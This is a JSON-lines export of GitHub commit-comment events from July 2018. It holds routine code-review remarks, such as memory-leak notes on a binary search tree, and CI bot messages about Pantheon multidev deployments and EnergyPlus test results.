{"id":"7952339154","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29676328,"position":null,"line":null,"path":null,"commit_id":"eb4d92bcb5c2fb492bf9516bdd3bdc06fa3b11e5","created_at":"2018-07-11T20:13:14Z","updated_at":"2018-07-11T20:13:14Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#pr-1](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-11T20:13:14Z"}
{"id":"7952340032","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29676329,"position":null,"line":null,"path":null,"commit_id":"d8ce20d0e3a22c2deba9bc12624ab3af4aa102b6","created_at":"2018-07-11T20:13:25Z","updated_at":"2018-07-11T20:13:25Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-278](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-278).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-278-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T20:13:25Z"}
{"id":"7952343040","type":"CommitCommentEvent","actor":{"login":"DronMDF"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29676336,"position":110,"line":100,"path":"node/app.py","commit_id":"6944a11ab5747ec089b89378afacc50e39709a88","created_at":"2018-07-11T20:14:04Z","updated_at":"2018-07-11T20:14:04Z","author_association":"OWNER","body":"@aatsurkan Ты вот зачем в этом методе все похерил?"}},"created_at":"2018-07-11T20:14:04Z"}
{"id":"7952343534","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"tc39/proposal-object-from-entries"},"payload":{"comment":{"id":29676337,"position":6,"line":28,"path":"spec.html","commit_id":"f3f9a7be19ed0a4009531d35ce953070903d7557","created_at":"2018-07-11T20:14:10Z","updated_at":"2018-07-11T20:14:10Z","author_association":"MEMBER","body":"oops, yes, thanks. will fix."}},"created_at":"2018-07-11T20:14:10Z"}
{"id":"7952344546","type":"CommitCommentEvent","actor":{"login":"DronMDF"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29676338,"position":129,"line":110,"path":"node/app.py","commit_id":"6944a11ab5747ec089b89378afacc50e39709a88","created_at":"2018-07-11T20:14:23Z","updated_at":"2018-07-11T20:14:23Z","author_association":"OWNER","body":"@aatsurkan И в этом?"}},"created_at":"2018-07-11T20:14:23Z"}
{"id":"7952346824","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29676340,"position":null,"line":null,"path":null,"commit_id":"01f0d757db9390e51f8a89ad0c93cf2313423406","created_at":"2018-07-11T20:14:53Z","updated_at":"2018-07-11T20:14:53Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#sep-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#sep-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://sep-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-11T20:14:53Z"}
{"id":"7952347147","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"tc39/proposal-object-from-entries"},"payload":{"comment":{"id":29676341,"position":6,"line":28,"path":"spec.html","commit_id":"f3f9a7be19ed0a4009531d35ce953070903d7557","created_at":"2018-07-11T20:14:58Z","updated_at":"2018-07-11T20:14:58Z","author_association":"MEMBER","body":"Fixed in https://github.com/tc39/proposal-object-from-entries/commit/8a23b86eb56e7c5d8a4c2a72fe79d276535c382c"}},"created_at":"2018-07-11T20:14:58Z"}
{"id":"7952355823","type":"CommitCommentEvent","actor":{"login":"FoxMcloud5655"},"repo":{"name":"FoxMcloud5655/NEW-NUSGrabberGUI"},"payload":{"comment":{"id":29676365,"position":null,"line":null,"path":null,"commit_id":"725b743a5f4a53c58ef50f8e93be77b03416cf2e","created_at":"2018-07-11T20:16:53Z","updated_at":"2018-07-11T20:16:53Z","author_association":"OWNER","body":"I guess you could just call me stuck up at the time :P  After reviewing the documentation and your code, everything seems in order.  Pulling now."}},"created_at":"2018-07-11T20:16:53Z"}
{"id":"7952364373","type":"CommitCommentEvent","actor":{"login":"FoxMcloud5655"},"repo":{"name":"FoxMcloud5655/NEW-NUSGrabberGUI"},"payload":{"comment":{"id":29676380,"position":47,"line":307,"path":"NUSGrabberGUI/Form1.cs","commit_id":"529210b7cb96c46ac3da71cc9368d0db13c5ee96","created_at":"2018-07-11T20:18:39Z","updated_at":"2018-07-11T20:18:39Z","author_association":"OWNER","body":"This is the only change I don't like."}},"created_at":"2018-07-11T20:18:39Z"}
{"id":"7952366436","type":"CommitCommentEvent","actor":{"login":"jackjwilliams"},"repo":{"name":"arjabbar/github-viewer"},"payload":{"comment":{"id":29676383,"position":null,"line":null,"path":null,"commit_id":"5760e58c970b111920aadc2f09a0f9fab6d0ed2e","created_at":"2018-07-11T20:19:06Z","updated_at":"2018-07-11T20:19:06Z","author_association":"NONE","body":"For future reference, this is typically committed. We typically put the VS Code run / build task / profiles in here so you can F5 from VSCode."}},"created_at":"2018-07-11T20:19:06Z"}
{"id":"7952368246","type":"CommitCommentEvent","actor":{"login":"mohitgusain"},"repo":{"name":"ColoredCow/php-bootcamp"},"payload":{"comment":{"id":29676386,"position":null,"line":null,"path":null,"commit_id":"75d906784a0210b36ea0e4a765c90211a8859474","created_at":"2018-07-11T20:19:29Z","updated_at":"2018-07-11T20:19:29Z","author_association":"COLLABORATOR","body":"- [ ]  Create a new page registrations.php.\r\n - [ ]  Add header and footer from index.php to registrations.php.\r\n  - [ ] The user should be able to navigate between these pages using the links in the header.\r\n - [ ]  Retrieve the registrations stored in the database.\r\n - [ ] Create a bootstrap table to show all the registrations. The columns in the table will be:\r\n     -  Serial number\r\n      - Name\r\n     - Phone\r\n - [ ] Create a new registration and verify that the registration table is updated."}},"created_at":"2018-07-11T20:19:29Z"}
{"id":"7952373444","type":"CommitCommentEvent","actor":{"login":"janno42"},"repo":{"name":"fsr-itse/EvaP"},"payload":{"comment":{"id":29676399,"position":37,"line":368,"path":"evap/evaluation/models.py","commit_id":"a17a401627ed3a8b9ac9953f22e7e343f9856a86","created_at":"2018-07-11T20:20:36Z","updated_at":"2018-07-11T20:20:36Z","author_association":"MEMBER","body":"This was tested a few lines above"}},"created_at":"2018-07-11T20:20:36Z"}
{"id":"7952376657","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29676411,"position":null,"line":null,"path":null,"commit_id":"df363c73d3789db5ddf243ab902848022b9e506b","created_at":"2018-07-11T20:21:17Z","updated_at":"2018-07-11T20:21:17Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newdomain](https://newdomain-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://newdomain-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-11T20:21:17Z"}
{"id":"7952377786","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676419,"position":66,"line":82,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T20:21:33Z","updated_at":"2018-07-11T20:21:33Z","author_association":"NONE","body":"Indeed, it can mess up ordering for some users which is annoying for manual maintenance. Probably better to keep it like this."}},"created_at":"2018-07-11T20:21:33Z"}
{"id":"7952380130","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676428,"position":74,"line":90,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T20:22:09Z","updated_at":"2018-07-11T20:22:09Z","author_association":"NONE","body":"I think this should be info and should include the version at which it updated the card, maybe even from which version."}},"created_at":"2018-07-11T20:22:09Z"}
{"id":"7952380952","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29676430,"position":null,"line":null,"path":null,"commit_id":"773c6af7aa135cfa781e59950d67559a84b217ce","created_at":"2018-07-11T20:22:20Z","updated_at":"2018-07-11T20:22:20Z","author_association":"OWNER","body":"Thats an :cry:-sticker for you, mister."}},"created_at":"2018-07-11T20:22:20Z"}
{"id":"7952383520","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/get-started-python"},"payload":{"comment":{"id":29676438,"position":null,"line":null,"path":null,"commit_id":"4ce98aa0029e4a499a91d0ad053c0299832d1301","created_at":"2018-07-11T20:22:58Z","updated_at":"2018-07-11T20:22:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/bb723936-a2f8-428d-bc40-0670ef9c4242?env_id=ibm%3Ayp%3Aeu-gb \"test_toolchain_3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/5d773d13-3e84-4c94-871e-3f81444267fd?env_id=ibm%3Ayp%3Aeu-gb \"test_pipeline\") deployed [get-started-python](https://github.com/felipemoran/get-started-python/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180711-202256 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180711-202256\") to [test](https://console.bluemix.net/apps/9c377974-010c-403a-b2a3-51a6463dfe1e?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-11T20:22:58Z"}
{"id":"7952384969","type":"CommitCommentEvent","actor":{"login":"janno42"},"repo":{"name":"fsr-itse/EvaP"},"payload":{"comment":{"id":29676444,"position":64,"line":512,"path":"evap/evaluation/models.py","commit_id":"a17a401627ed3a8b9ac9953f22e7e343f9856a86","created_at":"2018-07-11T20:23:19Z","updated_at":"2018-07-11T20:23:19Z","author_association":"MEMBER","body":"Would the early return also be possible for is_user_editor_or_delegate above?"}},"created_at":"2018-07-11T20:23:19Z"}
{"id":"7952385848","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29676449,"position":null,"line":null,"path":null,"commit_id":"773c6af7aa135cfa781e59950d67559a84b217ce","created_at":"2018-07-11T20:23:30Z","updated_at":"2018-07-11T20:23:30Z","author_association":"COLLABORATOR","body":"FUCK"}},"created_at":"2018-07-11T20:23:30Z"}
{"id":"7952386153","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29676450,"position":37,"line":37,"path":"dedshroom/utils/storage.js","commit_id":"5d2e31a1c8201561e4c1449637f18efe3bc06de0","created_at":"2018-07-11T20:23:35Z","updated_at":"2018-07-11T20:23:35Z","author_association":"OWNER","body":"Ye. I might write a custom copy function at some time."}},"created_at":"2018-07-11T20:23:35Z"}
{"id":"7952411851","type":"CommitCommentEvent","actor":{"login":"prasadgopal"},"repo":{"name":"czbiohub/tick-genome"},"payload":{"comment":{"id":29676520,"position":51,"line":52,"path":"reflow/fastqc.rf","commit_id":"25f0145dcb97a1d9b833913607d379d440f1069b","created_at":"2018-07-11T20:29:28Z","updated_at":"2018-07-11T20:29:28Z","author_association":"NONE","body":"I think this needs to be \r\nbasename := id + suffix"}},"created_at":"2018-07-11T20:29:28Z"}
{"id":"7952418244","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676533,"position":27,"line":27,"path":"BinarySearchTree/BST.h","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:30:48Z","updated_at":"2018-07-11T20:30:48Z","author_association":"NONE","body":"Your class doesn't have any private data, and that's usually a red flag.  The way you implemented this class it is basically just a group of related functions (like a namespace) and you don't even really need the class given you pass in the root of the tree for every function.  \r\n\r\nInstead, the root should have been kept inside the BST class as a private member.  This provides encapsulation and a cleaner interface (the user of this class doesn't have to manage the root themselves).  "}},"created_at":"2018-07-11T20:30:48Z"}
{"id":"7952425797","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29676543,"position":null,"line":null,"path":null,"commit_id":"828ea5371c38c35ea096ba55e6560928e0d52ff7","created_at":"2018-07-11T20:32:30Z","updated_at":"2018-07-11T20:32:30Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T20:32:30Z"}
{"id":"7952426779","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676547,"position":20,"line":20,"path":"BinarySearchTree/BST.cpp","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:32:44Z","updated_at":"2018-07-11T20:32:44Z","author_association":"NONE","body":"Who is responsible for freeing this memory?  Ideally it would be the BST class, and for that to work we should have the root and all the children nodes encapsulated inside the BST class as private members.  Right now this is just a memory leak."}},"created_at":"2018-07-11T20:32:44Z"}
{"id":"7952434912","type":"CommitCommentEvent","actor":{"login":"mtmorgan"},"repo":{"name":"Bioconductor/RaggedExperiment"},"payload":{"comment":{"id":29676557,"position":3,"line":218,"path":"vignettes/RaggedExperiment.Rmd","commit_id":"9fdcfbf0779d3508af7ae0afc288f946758b60d6","created_at":"2018-07-11T20:34:38Z","updated_at":"2018-07-11T20:34:38Z","author_association":"CONTRIBUTOR","body":"Line 218 should be deleted, I think, and 'isects' in line 219 should be ranges so that the function is like in the example"}},"created_at":"2018-07-11T20:34:38Z"}
{"id":"7952437384","type":"CommitCommentEvent","actor":{"login":"Silentage"},"repo":{"name":"Silentage/Brand-New-Starting"},"payload":{"comment":{"id":29676563,"position":4,"line":4,"path":"README.md","commit_id":"d58227530a9a9a341cd5693af3ffff1a1d8c47f8","created_at":"2018-07-11T20:35:12Z","updated_at":"2018-07-11T20:35:12Z","author_association":"OWNER","body":"Wow ok, also here"}},"created_at":"2018-07-11T20:35:12Z"}
{"id":"7952438263","type":"CommitCommentEvent","actor":{"login":"mtmorgan"},"repo":{"name":"Bioconductor/RaggedExperiment"},"payload":{"comment":{"id":29676569,"position":8,"line":118,"path":"man/assay-functions.Rd","commit_id":"9fdcfbf0779d3508af7ae0afc288f946758b60d6","created_at":"2018-07-11T20:35:25Z","updated_at":"2018-07-11T20:35:25Z","author_association":"CONTRIBUTOR","body":"I liked the more compact representation of the original example, though the values can be updated..."}},"created_at":"2018-07-11T20:35:25Z"}
{"id":"7952438786","type":"CommitCommentEvent","actor":{"login":"iurien"},"repo":{"name":"drobilla/lilv"},"payload":{"comment":{"id":29676571,"position":null,"line":null,"path":null,"commit_id":"5e80e165754064e9942fdf7bd3449a9f4fa047a0","created_at":"2018-07-11T20:35:32Z","updated_at":"2018-07-11T20:35:32Z","author_association":"NONE","body":"I have tested the fix with Ardour and it works:\r\n\r\nlrwxrwxrwx 1 iurie iurie 57 Jul 10 20:39 GCrash.wav -> /home/iurie/Desktop/Geontime/instruments/Drums/GCrash.wav\r\nlrwxrwxrwx 1 iurie iurie 66 Jul 11 21:27 GCrash.wav.2 -> /home/iurie/Desktop/Geontime/instruments/Drums/GeonKick/GCrash.wav\r\n\r\nThe fist one remained as a dangling link and the new link is created GCrash.wav.2. As you said probably to make some modifications to reuse the dangling link and not to pollute the directory, but this is less urgent I think. Thank you! :)\r\n"}},"created_at":"2018-07-11T20:35:32Z"}
{"id":"7952444960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29676590,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-11T20:36:50Z","updated_at":"2018-07-11T20:36:50Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2933 of 2934 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T20:36:50Z"}
{"id":"7952446363","type":"CommitCommentEvent","actor":{"login":"johelvisguzman"},"repo":{"name":"johelvisguzman/DotNetToolkit.Repository"},"payload":{"comment":{"id":29676591,"position":5,"line":421,"path":"src/DotNetToolkit.Repository.EntityFrameworkCore/EfCoreRepositoryContext.cs","commit_id":"89b033205404984a80df5c975e974985f3f65833","created_at":"2018-07-11T20:37:12Z","updated_at":"2018-07-11T20:37:12Z","author_association":"OWNER","body":"I was getting the following exception for entity framework core:\r\n\r\nThis overload of the method 'System.Linq.Queryable.GroupBy' is currently not supported.\r\n\r\nI think the reason why I was not seeing this exception on the first place is because I was not catching any exceptions for the async unit tests."}},"created_at":"2018-07-11T20:37:12Z"}
{"id":"7952452119","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676606,"position":39,"line":39,"path":"BinarySearchTree/BST.cpp","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:38:35Z","updated_at":"2018-07-11T20:38:35Z","author_association":"NONE","body":"What happens if we try to insert a node with a key that already exists in the tree?  What happens if I insert a node that already has left and right children?"}},"created_at":"2018-07-11T20:38:35Z"}
{"id":"7952453393","type":"CommitCommentEvent","actor":{"login":"Athas"},"repo":{"name":"diku-dk/futhark"},"payload":{"comment":{"id":29676608,"position":15,"line":352,"path":"src/Futhark/Pass/KernelBabysitting.hs","commit_id":"48f231d7dd46ce6f7a45a8a1491d17798c549f5e","created_at":"2018-07-11T20:38:52Z","updated_at":"2018-07-11T20:38:52Z","author_association":"MEMBER","body":"Don't put comments stating what something was previously.  These remarks quickly become stale and are red herrings next time someone has to go spelunking in the code."}},"created_at":"2018-07-11T20:38:52Z"}
{"id":"7952454831","type":"CommitCommentEvent","actor":{"login":"johelvisguzman"},"repo":{"name":"johelvisguzman/DotNetToolkit.Repository"},"payload":{"comment":{"id":29676612,"position":26,"line":33,"path":"test/DotNetToolkit.Repository.Integration.Test/Data/TestBase.cs","commit_id":"88ca1e4f9c474cf548da20536627a0e9e14816af","created_at":"2018-07-11T20:39:13Z","updated_at":"2018-07-11T20:39:13Z","author_association":"OWNER","body":"This code is able to ensure that none of the async unit tests methods are not throwing unexpected exception. This means that I will actually know if the test is failing or not. This was not happening before 😢 "}},"created_at":"2018-07-11T20:39:13Z"}
{"id":"7952456147","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676617,"position":66,"line":66,"path":"BinarySearchTree/BST.cpp","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:39:31Z","updated_at":"2018-07-11T20:39:31Z","author_association":"NONE","body":"Memory leak!"}},"created_at":"2018-07-11T20:39:31Z"}
{"id":"7952461064","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676623,"position":null,"line":null,"path":null,"commit_id":"7d8f1935f08b30c96c79a38629f09aa4a5f28768","created_at":"2018-07-11T20:40:36Z","updated_at":"2018-07-11T20:40:36Z","author_association":"COLLABORATOR","body":"<h3>MenuItem bring back usePortal={false} (removed unsafely in #2539)</h3>\n\nPreview: <strong><a href='https://18432-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18432-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18432-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T20:40:36Z"}
{"id":"7952461359","type":"CommitCommentEvent","actor":{"login":"janno42"},"repo":{"name":"fsr-itse/EvaP"},"payload":{"comment":{"id":29676625,"position":6,"line":265,"path":"evap/results/tests/test_views.py","commit_id":"38bc46b1b554cd69afae28fbe7d808b6598802d3","created_at":"2018-07-11T20:40:40Z","updated_at":"2018-07-11T20:40:40Z","author_association":"MEMBER","body":"Can you add a comment why these need to be set to 0 here?"}},"created_at":"2018-07-11T20:40:40Z"}
{"id":"7952465981","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676634,"position":61,"line":61,"path":"BinarySearchTree/BST.cpp","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:41:38Z","updated_at":"2018-07-11T20:41:38Z","author_association":"NONE","body":"Generally a lookup function will return the associated node if it is found, printing to the console isn't the optimal behavior here."}},"created_at":"2018-07-11T20:41:38Z"}
{"id":"7952476707","type":"CommitCommentEvent","actor":{"login":"macgupta"},"repo":{"name":"macgupta/onap-model"},"payload":{"comment":{"id":29676648,"position":null,"line":null,"path":null,"commit_id":"987e0c959c971b46096789987e8fe3c641baa708","created_at":"2018-07-11T20:43:55Z","updated_at":"2018-07-11T20:43:55Z","author_association":"OWNER","body":"I meant to say, one set of classes to cover both public and private cloud is a bit difficult.  "}},"created_at":"2018-07-11T20:43:55Z"}
{"id":"7952477400","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29676650,"position":72,"line":72,"path":"BinarySearchTree/BST.cpp","commit_id":"838022627384638fb2626ddff56c37fea7edf706","created_at":"2018-07-11T20:44:04Z","updated_at":"2018-07-11T20:44:04Z","author_association":"NONE","body":"This works, but could've been done recursively.  The recursive way is a bit more elegant.  Anytime you are implementing a tree algorithm, mostly likely it is better to do it recursively."}},"created_at":"2018-07-11T20:44:04Z"}
{"id":"7952478950","type":"CommitCommentEvent","actor":{"login":"LethalManBoob"},"repo":{"name":"Novum/vkQuake"},"payload":{"comment":{"id":29676659,"position":null,"line":null,"path":null,"commit_id":"6eacc1faa2727377fe3d5039a12b70edf6b3f3a3","created_at":"2018-07-11T20:44:24Z","updated_at":"2018-07-11T20:44:24Z","author_association":"NONE","body":"Hello. Is there anyway I get can a hold on all launch commands? Thanks. "}},"created_at":"2018-07-11T20:44:24Z"}
{"id":"7952480556","type":"CommitCommentEvent","actor":{"login":"NobbZ"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29676662,"position":14,"line":23,"path":"config.json","commit_id":"e7fb51026912753414601d8dd1c5fafb15683216","created_at":"2018-07-11T20:44:44Z","updated_at":"2018-07-11T20:44:44Z","author_association":"NONE","body":"Can you please explain why this rename happened?\r\n\r\nSee also exercism/v2-feedback#206"}},"created_at":"2018-07-11T20:44:44Z"}
{"id":"7952482314","type":"CommitCommentEvent","actor":{"login":"NobbZ"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29676667,"position":19,"line":28,"path":"config.json","commit_id":"e7fb51026912753414601d8dd1c5fafb15683216","created_at":"2018-07-11T20:45:08Z","updated_at":"2018-07-11T20:45:08Z","author_association":"NONE","body":"Can you please explain why the exercise has been deprecated?\r\n\r\nSee also exercism/v2-feedback#206"}},"created_at":"2018-07-11T20:45:08Z"}
{"id":"7952482554","type":"CommitCommentEvent","actor":{"login":"ID2GO"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29676669,"position":null,"line":null,"path":null,"commit_id":"81fe10a47364d2484770d95498595dd8f71d3b24","created_at":"2018-07-11T20:45:11Z","updated_at":"2018-07-11T20:45:11Z","author_association":"NONE","body":"Nice piece of code but when I run it on an emulator or phone, it does not delete anything yet....\r\nAnyone any suggestions?"}},"created_at":"2018-07-11T20:45:11Z"}
{"id":"7952491737","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29676700,"position":null,"line":null,"path":null,"commit_id":"758d23baee683aa5fb9192978d9721b8989999bb","created_at":"2018-07-11T20:47:06Z","updated_at":"2018-07-11T20:47:06Z","author_association":"MEMBER","body":"i was testing auto pull\r\nit didn't automatically pull\r\nbecause the .git directory was missing on the server"}},"created_at":"2018-07-11T20:47:06Z"}
{"id":"7952492190","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29676701,"position":null,"line":null,"path":null,"commit_id":"758d23baee683aa5fb9192978d9721b8989999bb","created_at":"2018-07-11T20:47:12Z","updated_at":"2018-07-11T20:47:12Z","author_association":"MEMBER","body":"g"}},"created_at":"2018-07-11T20:47:12Z"}
{"id":"7952499913","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29676721,"position":null,"line":null,"path":null,"commit_id":"60b121e008793f638025cf94da2eb09fe63a4d32","created_at":"2018-07-11T20:48:47Z","updated_at":"2018-07-11T20:48:47Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T20:48:47Z"}
{"id":"7952501240","type":"CommitCommentEvent","actor":{"login":"heathdutton"},"repo":{"name":"mautic/mautic"},"payload":{"comment":{"id":29676724,"position":55,"line":55,"path":"app/bundles/LeadBundle/Segment/Query/Expression/CompositeExpression.php","commit_id":"53218d831b66efa257789157dc43ada31f345b53","created_at":"2018-07-11T20:49:04Z","updated_at":"2018-07-11T20:49:04Z","author_association":"CONTRIBUTOR","body":"Could you expose these private parts so that we can all play with them in event dispatches?"}},"created_at":"2018-07-11T20:49:04Z"}
{"id":"7952507314","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29676730,"position":6,"line":127,"path":"src/AspNetCoreModuleV2/CommonLib/debugutil.cpp","commit_id":"5499b6bbdbc4d5d9660a419276f3aa0efc078f82","created_at":"2018-07-11T20:50:20Z","updated_at":"2018-07-11T20:50:20Z","author_association":"CONTRIBUTOR","body":"This is wrong, either small `s` or `LOG_INFOF`"}},"created_at":"2018-07-11T20:50:20Z"}
{"id":"7952508999","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29676732,"position":null,"line":null,"path":null,"commit_id":"2a3d09bf095d5c05e81d8837bdc273d183054953","created_at":"2018-07-11T20:50:41Z","updated_at":"2018-07-11T20:50:41Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#pr-1](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-11T20:50:41Z"}
{"id":"7952512141","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29676740,"position":null,"line":null,"path":null,"commit_id":"7f86fcb2ac4fde7cae7acd0e44d6479e7f671355","created_at":"2018-07-11T20:51:23Z","updated_at":"2018-07-11T20:51:23Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-9](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-9-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-11T20:51:23Z"}
